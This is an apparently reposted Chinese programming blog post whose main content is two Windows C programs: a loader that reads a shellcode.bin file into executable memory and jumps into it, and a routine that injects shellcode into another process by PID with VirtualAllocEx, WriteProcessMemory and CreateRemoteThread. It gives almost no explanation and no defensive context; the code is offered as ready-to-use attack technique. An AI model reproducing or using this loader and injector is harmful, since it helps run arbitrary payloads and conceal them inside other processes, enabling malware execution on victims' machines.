生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.
2021/9/12 7:07:16
本文主要是介绍生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1 通过上方代码生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可. 2 3 #include <stdio.h> 4 #include <Windows.h> 5 6 int main(int argc, char * argv[]) 7 { 8 HANDLE fp; 9 unsigned char * fBuffer; 10 DWORD fSize, dwSize; 11 12 fp = CreateFile(L"c://shellcode.bin", GENERIC_READ, FILE_SHARE_READ, NULL, 13 OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 14 15 fSize = GetFileSize(fp, 0); 16 fBuffer = (unsigned char *)VirtualAlloc(NULL, fSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 17 ReadFile(fp, fBuffer, fSize, &dwSize, 0); 18 CloseHandle(fp); 19 20 __asm 21 { 22 mov eax,fBuffer 23 push eax 24 ret 25 int 3 26 } 27 return 0; 28 } 29 ShellCode注入进程: 30 31 #include <stdio.h> 32 #include <windows.h> 33 34 unsigned char ShellCode[] = "shellcode代码"; 35 36 BOOL InjectShellCode(int Pid) 37 { 38 HANDLE Handle, remoteThread; 39 PVOID remoteBuffer; 40 41 Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid); 42 43 remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); 44 WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL); 45 remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL); 46 CloseHandle(Handle); 47 } 48 49 50 int main(int argc, char *argv[]) 51 { 52 InjectShellCode(1024); 53 return 0; 54 }
这篇关于生成二进制shellcode.bin文件,然后将其动态读入内存,并执行即可.的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-29易优CMS安装常见问题汇总-icode9专业技术文章分享
- 2024-06-28易优新手必读安装教程-icode9专业技术文章分享
- 2024-06-28忘记eyoucms后台密码怎么办?-icode9专业技术文章分享
- 2024-06-26终极指南:Scrum中如何设置需求优先级
- 2024-06-26AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能
- 2024-06-26小白家庭 nas 搭建方案-icode9专业技术文章分享
- 2024-06-23AI大模型企业应用实战(14)-langchain的Embedding
- 2024-06-23AI大模型企业应用实战(15)-langchain核心组件
- 2024-06-23AI大模型企业应用实战(16)-langchain核心组件
- 2024-06-23AI 大模型企业应用实战(06)-初识LangChain